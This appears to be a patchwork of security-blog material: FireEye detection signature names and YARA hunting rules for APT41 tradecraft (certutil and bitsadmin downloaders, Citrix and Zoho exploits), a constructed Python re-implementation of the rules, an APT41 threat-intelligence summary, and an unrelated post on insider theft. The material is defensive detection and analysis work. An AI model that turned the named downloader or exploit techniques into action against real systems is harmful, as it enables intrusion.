    FireEye detects this activity across our platforms. This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

    Platform            Signature Name
    Endpoint Security   BITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY)
                        CERTUTIL.EXE DOWNLOADER A (UTILITY)
                        Generic.mg.5909983db4d9023e
                        Generic.mg.3e856162c36b5329
                        POWERSHELL DOWNLOADER (METHODOLOGY)
                        SUSPICIOUS BITSADMIN USAGE B (METHODOLOGY)
                        SAMWELL (BACKDOOR)
                        SUSPICIOUS CODE EXECUTION FROM ZOHO MANAGE ENGINE (EXPLOIT)
    Network Security    Backdoor.Meterpreter
                        DTI.Callback
                        Exploit.CitrixNetScaler
                        Trojan.METASTAGE
                        Exploit.ZohoManageEngine.CVE-2020-10198.Pwner
                        Exploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader
    Helix               CITRIX ADC [Suspicious Commands]
                        EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt]
                        EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success]
                        EXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access]
                        EXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning]
                        MALWARE METHODOLOGY [Certutil User-Agent]
                        WINDOWS METHODOLOGY [BITSadmin Transfer]
                        WINDOWS METHODOLOGY [Certutil Downloader]

    MITRE ATT&CK Technique Mapping

    Tactic                Techniques
    Initial Access        External Remote Services (T1133), Exploit Public-Facing Application (T1190)
    Execution             PowerShell (T1086), Scripting (T1064)
    Persistence           New Service (T1050)
    Privilege Escalation  Exploitation for Privilege Escalation (T1068)
    Defense Evasion       BITS Jobs (T1197), Process Injection (T1055)
    Command and Control   Remote File Copy (T1105), Commonly Used Port (T1043), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071)

    Appendix A: Discovery Rules

    The following YARA rules serve as examples of discovery rules for APT41 actor TTPs, turning the adversary's methods or tradecraft into new haystacks for detection or hunting. For all tradecraft-based discovery rules, we recommend deliberate testing and tuning prior to implementation in any production system. Some of these rules are tailored to build concise haystacks that are easy to review for high-fidelity detections; others are broad in aperture and build larger haystacks for further automation or processing in threat hunting systems.

    import "pe"

    rule ExportEngine_APT41_Loader_String
    {
        meta:
            author = "@stvemillertime"
            description = "This looks for a common APT41 Export DLL name in BEACON shellcode loaders, such as loader_X86_svchost.dll"
        strings:
            $pcre = /loader_[\x00-\x7F]{1,}\x00/
        condition:
            uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))
    }

    rule ExportEngine_ShortName
    {
        meta:
            author = "@stvemillertime"
            description = "This looks for Win PEs where Export DLL name is a single character"
        strings:
            $pcre = /[A-Za-z0-9]{1}\.(dll|exe|dat|bin|sys)/
        condition:
            uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))
    }

    rule ExportEngine_xArch
    {
        meta:
            author = "@stvemillertime"
            description = "This looks for Win PEs where Export DLL name is a something like x32.dat"
        strings:
            $pcre = /[\x00-\x7F]{1,}x(32|64|86)\.dat\x00/
        condition:
            uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))
    }

    rule RareEquities_LibTomCrypt
    {
        meta:
            author = "@stvemillertime"
            description = "This looks for executables with strings from LibTomCrypt as seen by some APT41-esque actors https://github.com/libtom/libtomcrypt - might catch everything BEACON as well. You may want to exclude Golang and UPX packed samples."
        strings:
            $a1 = "LibTomMath"
        condition:
            uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1
    }

    rule RareEquities_KCP

    {

        meta:

            author = "@stvemillertime"

            description = "This is a wide catchall rule looking for executables with equities for a transport library called KCP, https://github.com/skywind3000/kcp Matches on this rule may have built-in KCP transport ability."

        strings:

            $a01 = "[RO] %ld bytes"

            $a02 = "recv sn=%lu"

            $a03 = "[RI] %d bytes"

            $a04 = "input ack: sn=%lu rtt=%ld rto=%ld"

            $a05 = "input psh: sn=%lu ts=%lu"

            $a06 = "input probe"

            $a07 = "input wins: %lu"

            $a08 = "rcv_nxt=%lu\\n"

            $a09 = "snd(buf=%d, queue=%d)\\n"

            $a10 = "rcv(buf=%d, queue=%d)\\n"

            $a11 = "rcvbuf"

        condition:

            (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 5MB and 3 of ($a*)

    }

    rule ConventionEngine_Term_Users

    {

                meta:

                            author = "@stvemillertime"

                            description = "Searching for PE files with PDB path keywords, terms or anomalies."

                            sample_md5 = "09e4e6fa85b802c46bc121fcaecc5666"

                            ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

                strings:

                            $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Users[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii

                condition:

                            (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre

    }

    rule ConventionEngine_Term_Desktop

    {

                meta:

                            author = "@stvemillertime"

                            description = "Searching for PE files with PDB path keywords, terms or anomalies."

                            sample_md5 = "71cdba3859ca8bd03c1e996a790c04f9"

                            ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

                strings:

                            $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Desktop[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii

                condition:

                            (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre

    }

    rule ConventionEngine_Anomaly_MultiPDB_Double

    {

                meta:

                            author = "@stvemillertime"

                            description = "Searching for PE files with PDB path keywords, terms or anomalies."

                            sample_md5 = "013f3bde3f1022b6cf3f2e541d19353c"

                            ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

                strings:

                            $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/

                condition:

                            (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2

    }
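The ConventionEngine checks above (PDB path terms and the double-RSDS anomaly) re-implemented in Python, as an added example that is not part of the FireEye appendix, so the same logic can be exercised in a triage script or unit test outside YARA. The input bytes are constructed for the example, and `build_sample` is hypothetical test scaffolding rather than anything from a real sample.

```python
"""Constructed example: ConventionEngine-style PDB path checks in Python."""
import re
import struct
import uuid

# RSDS CodeView record: signature, 16-byte GUID, 4-byte age, NUL-terminated PDB path
RSDS_RE = re.compile(rb"RSDS(.{16})(.{4})([A-Za-z]:\\[^\x00]{0,400}\.pdb)\x00", re.DOTALL)
TERMS = ("users", "desktop")  # the path keywords the Term_* rules key on


def is_pe(data: bytes) -> bool:
    """Same gate as the YARA rules: 'MZ' at 0 and 'PE\\0\\0' at e_lfanew (offset 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def pdb_records(data: bytes):
    """Yield (guid, age, path) for every RSDS record found in the blob."""
    for m in RSDS_RE.finditer(data):
        guid = str(uuid.UUID(bytes_le=m.group(1)))
        age = struct.unpack("<I", m.group(2))[0]
        yield guid, age, m.group(3).decode("latin-1")


def convention_engine(data: bytes) -> dict:
    """Mirror the three ConventionEngine rules: term hits plus the MultiPDB_Double anomaly."""
    if not is_pe(data):
        return {"pe": False, "paths": [], "terms": [], "multi_pdb_double": False}
    recs = list(pdb_records(data))
    paths = [p for _, _, p in recs]
    terms = sorted({t for p in paths for t in TERMS if t in p.lower()})
    return {"pe": True, "paths": paths, "terms": terms, "multi_pdb_double": len(recs) == 2}


def build_sample(*paths: str) -> bytes:
    """Constructed minimal PE-shaped blob with one RSDS record per path (test input only)."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3A) + struct.pack("<I", 0x40) + b"PE\x00\x00"
    body = b""
    for i, p in enumerate(paths):
        body += b"RSDS" + bytes([i] * 16) + struct.pack("<I", 1) + p.encode() + b"\x00" + b"\x90" * 8
    return bytes(hdr) + body


if __name__ == "__main__":
    sample = build_sample(r"C:\Users\dev\Desktop\loader\Release\loader_X86_svchost.pdb")
    print(convention_engine(sample))
```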

    APT41: A Dual Espionage and Cyber Crime Operation

    Today, FireEye Intelligence is releasing a comprehensive report detailing APT41, a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain. Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.

    The full published report covers historical and ongoing activity attributed to APT41, the evolution of the group’s tactics, techniques, and procedures (TTPs), information on the individual actors, an overview of their malware toolset, and how these identifiers overlap with other known Chinese espionage operators. APT41 partially coincides with public reporting on groups including BARIUM (Microsoft) and Winnti (Kaspersky, ESET, Clearsky).

    Who Does APT41 Target?

    Like other Chinese espionage operators, APT41 espionage targeting has generally aligned with China's Five-Year economic development plans. The group has established and maintained strategic access to organizations in the healthcare, high-tech, and telecommunications sectors. APT41 operations against higher education, travel services, and news/media firms provide some indication that the group also tracks individuals and conducts surveillance. For example, the group has repeatedly targeted call record information at telecom companies. In another instance, APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there, suggesting the group was tasked to reconnoiter the facility for security reasons.

    The group’s financially motivated activity has primarily focused on the video game industry, where APT41 has manipulated virtual currencies and even attempted to deploy ransomware. The group is adept at moving laterally within targeted networks, including pivoting between Windows and Linux systems, until it can access game production environments. From there, the group steals source code as well as digital certificates which are then used to sign malware. More importantly, APT41 is known to use its access to production environments to inject malicious code into legitimate files which are later distributed to victim organizations. These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns.

    Interestingly, despite the significant effort required to execute supply chain compromises and the large number of affected organizations, APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers. These multi-stage operations restrict malware delivery only to intended victims and significantly obfuscate the intended targets. In contrast, a typical spear-phishing campaign’s desired targeting can be discerned based on recipients' email addresses.

    A breakdown of industries directly targeted by APT41 over time can be found in Figure 1.

    Figure 1: Timeline of industries directly targeted by APT41

    Probable Chinese Espionage Contractors

    Two identified personas using the monikers “Zhang Xuguang” and “Wolfzhi” linked to APT41 operations have also been identified in Chinese-language forums. These individuals advertised their skills and services and indicated that they could be hired. Zhang listed his online hours as 4:00pm to 6:00am, similar to APT41 operational times against online gaming targets and suggesting that he is moonlighting. Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs.

    Attribution to these individuals is backed by identified persona information, their previous work and apparent expertise in programming skills, and their targeting of Chinese market-specific online games. The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations.


    Figure 2: Operational activity for gaming versus non-gaming-related targeting based on observed operations since 2012

    The Right Tool for the Job

    APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. The group often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims. Once in a victim organization, APT41 can leverage more sophisticated TTPs and deploy additional malware. For example, in a campaign running almost a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware including backdoors, credential stealers, keyloggers, and rootkits.

    APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems. The use of bootkits in particular adds an extra layer of stealth because the code is executed prior to the operating system initializing. The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets.

    Fast and Relentless

    APT41 quickly identifies and compromises intermediary systems that provide access to otherwise segmented parts of an organization’s network. In one case, the group compromised hundreds of systems across multiple network segments and several geographic regions in as little as two weeks.

    The group is also highly agile and persistent, responding quickly to changes in victim environments and incident responder activity. Hours after a victimized organization made changes to thwart APT41, for example, the group compiled a new version of a backdoor using a freshly registered command-and-control domain and compromised several systems across multiple geographic regions. In a different instance, APT41 sent spear-phishing emails to multiple HR employees three days after an intrusion had been remediated and systems were brought back online. Within hours of a user opening a malicious attachment sent by APT41, the group had regained a foothold within the organization's servers across multiple geographic regions.

    Looking Ahead

    APT41 is a creative, skilled, and well-resourced adversary, as highlighted by the operation’s distinct use of supply chain compromises to target select individuals, consistent signing of malware using compromised digital certificates, and deployment of bootkits (which is rare among Chinese APT groups).

    Like other Chinese espionage operators, APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015. This shift, however, has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons. The group's capabilities and targeting have both broadened over time, signaling the potential for additional supply chain compromises affecting a variety of victims in additional verticals.

    APT41's links to both underground marketplaces and state-sponsored activity may indicate that the group enjoys protections that enable it to conduct its own for-profit activities, or that authorities are willing to overlook them. It is also possible that APT41 has simply evaded scrutiny from Chinese authorities. Regardless, these operations underscore a blurred line between state power and crime that lies at the heart of threat ecosystems and is exemplified by APT41.

    Read the report today to learn more.

    Forcing the Adversary to Pursue Insider Theft

    Jack Crook pointed me toward a story by Christopher Burgess about intellectual property theft by "Hongjin Tan, a 35 year old Chinese national and U.S. legal permanent resident... [who] was arrested on December 20 and charged with theft of trade secrets. Tan is alleged to have stolen the trade secrets from his employer, a U.S. petroleum company," according to the criminal complaint filed by the US DoJ.

    Tan's former employer and the FBI allege that Tan "downloaded restricted files to a personal thumb drive." I could not tell from the complaint if Tan downloaded the files at work or at home, but the thumb drive ended up at Tan's home. His employer asked Tan to bring it to their office, which Tan did. However, he had deleted all the files from the drive. Tan's employer recovered the files using commercially available forensic software.

    This incident, by definition, involves an "insider threat." Tan was an employee who appears to have copied information that was outside the scope of his work responsibilities, resigned from his employer, and was planning to return to China to work for a competitor, having delivered his former employer's intellectual property.

    When I started GE-CIRT in 2008 (officially "initial operating capability" on 1 January 2009), one of the strategies we pursued involved insider threats. I've written about insiders on this blog before but I couldn't find a description of the strategy we implemented via GE-CIRT.

    We sought to make digital intrusions more expensive than physical intrusions.

    In other words, we wanted to make it easier for the adversary to accomplish his mission using insiders. We wanted to make it more difficult for the adversary to accomplish his mission using our network.

    In a cynical sense, this makes security someone else's problem. Suddenly the physical security team is dealing with the worst of the worst!

    This is a win for everyone, however. Consider the many advantages the physical security team has over the digital security team.

    The physical security team can work with human resources during the hiring process. HR can run background checks and identify suspicious job applicants prior to granting employment and access.

    Employees are far more exposed than remote intruders. Employees, even under cover, expose their appearance, likely residence, and personalities to the company and its workers.

    Employees can be subject to far more intensive monitoring than remote intruders. Employee endpoints can be instrumented. Employee workspaces are instrumented via access cards, cameras at entry and exit points, and other measures.

    Employers can cooperate with law enforcement to investigate and prosecute employees. They can control and deter theft and other activities.

    In brief, insider theft, like all "close access" activities, is incredibly risky for the adversary. It is a win for everyone when the adversary must resort to using insiders to accomplish their mission. Digital and physical security must cooperate to leverage these advantages, while collaborating with human resources, legal, information technology, and business lines to wring the maximum results from this advantage.